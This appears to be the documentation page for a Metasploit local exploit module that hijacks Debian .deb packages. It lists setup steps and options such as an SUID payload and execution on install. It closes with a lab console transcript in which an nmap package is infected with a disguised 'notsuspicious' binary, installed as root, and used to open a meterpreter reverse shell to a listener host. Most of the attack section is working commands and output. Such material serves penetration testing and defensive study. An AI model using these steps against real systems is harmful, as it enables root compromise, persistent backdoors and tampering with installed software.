rapid7/metasploit-framework
# Debian package hijacker

## Vulnerable Application

This module exploits the widespread lack of per-package signing
in the Debian package ecosystem. Most `.deb` files are vulnerable
to manipulation if read-write access is available. By injecting a
payload into the package we can gain execution as the root user.
Custom dependencies can also be specified, allowing us to install
additional software. This module can be run with a handler, but it
is not enabled by default.

The exploit module was authored by:

- Andrew Vanderbilt @ Vander Security (Original PoC)
- Nick Cottrell <Rad10Logic> (PoC Additions)

## Verification Steps

 1. Start msfconsole
 2. Get a root session
 3. `use exploit/linux/local/debian_package_hijacker`
 4. `set SESSION <id>`
 5. `set PACKAGE <package_name>` # should be either path to local package or name of apt package
 6. `set DEPENDENCIES <extra_dependencies>`
 7. `set INSTALL_PACKAGE true`
 8. `set DisablePayloadHandler false`
 9. `set ExecuteOnInstall true`
10. `exploit -z`
11. Ensure you have a 2nd root session


## Options

The module provides several configurable options:

- `PACKAGE` (required): The absolute file path to the Debian package
to hijack.

- `INSTALL_PACKAGE` (optional): If set to true, the module will
attempt to install the newly infected package, reinstalling the
package if necessary. Default is `false`.

- `DEPENDENCIES` (optional): Package dependencies to inject into
control file. Separate multiple dependencies with a comma (`,`), e
g., `depends1,depends2`.

- `PAYLOAD_DESTINATION` (optional): Determines where the binary will
be stored. This option is only available when `TARGET` is set to
`Linux dropper`.

- `SUID_PAYLOAD` (optional): If set to true, the payload will have
the SUID bit set so anyone running it will be root. Default is
`true`. This option is only available when `TARGET` is set to
`Linux dropper`.

There are also some advanced options:

- `WritableDir` (required): A directory where temporary files can be
written, default is `/tmp/`.

- `ExecuteOnInstall` (optional): If set to true, the payload will be
executed during installation. Default is `false`. This option is only
available when `TARGET` is set to `Linux dropper`.

## Scenarios

```
msf6 > use exploit/linux/local/debian_package_hijacker
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/debian_package_hijacker) > set session 6 
session => 6
msf6 exploit(linux/local/debian_package_hijacker) > set verbose true 
verbose => true
msf6 exploit(linux/local/debian_package_hijacker) > set package nmap
package => nmap
msf6 exploit(linux/local/debian_package_hijacker) > set install_package true 
install_package => true
msf6 exploit(linux/local/debian_package_hijacker) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/debian_package_hijacker) > set lhost vboxnet0 
lhost => 192.168.56.1
msf6 exploit(linux/local/debian_package_hijacker) > set AllowNoCleanup true 
AllowNoCleanup => true
msf6 exploit(linux/local/debian_package_hijacker) > run

[+] Session confirms it's Debian.
[*] Could not find deb file in PACKAGE path
[+] Found PACKAGE as apt package
[*] Working directory: /tmp/.icfpw36j
[*] postinst_file: /tmp/.icfpw36j/extracted/DEBIAN/postinst.
[*] control_file: /tmp/.icfpw36j/extracted/DEBIAN/control.
[*] Creating directory /tmp/.icfpw36j
[*] /tmp/.icfpw36j created
[*] Could not find package on system, but found it in apt
[*] Package: nmap_7.91+dfsg1+really7.80+dfsg1-2_amd64.deb
[*] Adding /usr/local/bin/notsuspicious to package
[*] Creating directory /tmp/.icfpw36j/extracted/usr
[*] /tmp/.icfpw36j/extracted/usr created
[*] Creating directory /tmp/.icfpw36j/extracted/usr/local
[*] /tmp/.icfpw36j/extracted/usr/local created
[*] Creating directory /tmp/.icfpw36j/extracted/usr/local/bin
[*] /tmp/.icfpw36j/extracted/usr/local/bin created
[*] Generated payload file at usr/local/bin/notsuspicious
[*] Set new binary to proper permissions
[*] New binary digest [b20b40c1ea21325f5dd4431d2a8a446d]
[*] Added new hash to sums
[*] Installing infected package
[*] Running command: apt install -y ./nmap_7.91+dfsg1+really7.80+dfsg1-2_amd64.deb
[*] 
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

Reading package lists...
Building dependency tree...
Reading state information...
The following additional packages will be installed:
  liblinear4 nmap-common
Suggested packages:
  liblinear-tools liblinear-dev ncat ndiff zenmap
The following NEW packages will be installed:
  liblinear4 nmap nmap-common
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 4060 kB/5960 kB of archives.
After this operation, 25.9 MB of additional disk space will be used.
Get:1 /home/radmin/nmap_7.91+dfsg1+really7.80+dfsg1-2_amd64.deb nmap amd64 7.91+dfsg1+really7.80+dfsg1-2 [1899 kB]
Get:2 http://deb.debian.org/debian bullseye/main amd64 liblinear4 amd64 2.3.0+dfsg-5 [43.6 kB]
Get:3 http://deb.debian.org/debian bullseye/main amd64 nmap-common all 7.91+dfsg1+really7.80+dfsg1-2 [4017 kB]
debconf: unable to initialize frontend: Dialog
debconf: (TERM is not set, so the dialog frontend is not usable.)
debconf: falling back to frontend: Readline
debconf: unable to initialize frontend: Readline
debconf: (This frontend requires a controlling tty.)
debconf: falling back to frontend: Teletype
dpkg-preconfigure: unable to re-open stdin: 
Fetched 4060 kB in 1s (6302 kB/s)
Selecting previously unselected package liblinear4:amd64.
(Reading database ... 261904 files and directories currently installed.)
Preparing to unpack .../liblinear4_2.3.0+dfsg-5_amd64.deb ...
Unpacking liblinear4:amd64 (2.3.0+dfsg-5) ...
Selecting previously unselected package nmap-common.
Preparing to unpack .../nmap-common_7.91+dfsg1+really7.80+dfsg1-2_all.deb ...
Unpacking nmap-common (7.91+dfsg1+really7.80+dfsg1-2) ...
Selecting previously unselected package nmap.
Preparing to unpack .../nmap_7.91+dfsg1+really7.80+dfsg1-2_amd64.deb ...
Unpacking nmap (7.91+dfsg1+really7.80+dfsg1-2) ...
Setting up liblinear4:amd64 (2.3.0+dfsg-5) ...
Setting up nmap-common (7.91+dfsg1+really7.80+dfsg1-2) ...
Setting up nmap (7.91+dfsg1+really7.80+dfsg1-2) ...
Processing triggers for man-db (2.9.4-2) ...
[*] Package installed. Marking downloaded package for deletion.
msf6 exploit(linux/local/debian_package_hijacker) > use payload/linux/x64/meterpreter/reverse_tcp 
msf6 payload(linux/x64/meterpreter/reverse_tcp) > set lhost vboxnet0 
lhost => 192.168.56.1
msf6 payload(linux/x64/meterpreter/reverse_tcp) > exploit -z
[*] Payload Handler Started as Job 3
msf6 payload(linux/x64/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.56.1:4444 
sessions -i 6 -c /usr/local/bin/notsuspicious
[*] Running '/usr/local/bin/notsuspicious' on meterpreter session 6 (192.168.56.126)
[*] Sending stage (3045348 bytes) to 192.168.56.126
[*] Meterpreter session 7 opened (192.168.56.1:4444 -> 192.168.56.126:37788) at 2023-07-17 16:40:37 -0400
[*] This is CredCollect, I have the conn!
```
